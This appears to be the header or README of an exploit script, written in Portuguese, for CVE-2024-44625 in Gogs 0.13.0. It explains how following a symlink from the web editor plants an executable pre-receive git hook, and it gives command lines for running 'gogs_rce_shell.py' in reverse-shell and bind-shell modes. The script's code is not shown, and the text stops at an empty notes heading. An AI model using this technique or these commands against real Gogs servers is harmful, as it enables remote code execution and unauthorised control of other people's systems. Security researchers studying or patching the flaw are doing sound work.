
Exploit para CVE-2024-44625 no Gogs 0.13.0, alcançando execução remota de código via symlink-follow para criar um git hook, com modos de shell reverso e bind.
Validado contra um Gogs da era 0.13.0 atrás de um proxy reverso. Primitiva: symlink-follow do editor web para um .git/hooks/pre-receive AUSENTE cria esse arquivo (executável). Todo push subsequente para o repositório o executa.
Uso:
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost <YOUR_IP> --lport 4444
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode bind --bind-port 5555
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost IP --lport 4444 --repo <name> --reuse --triggers 3
Notas: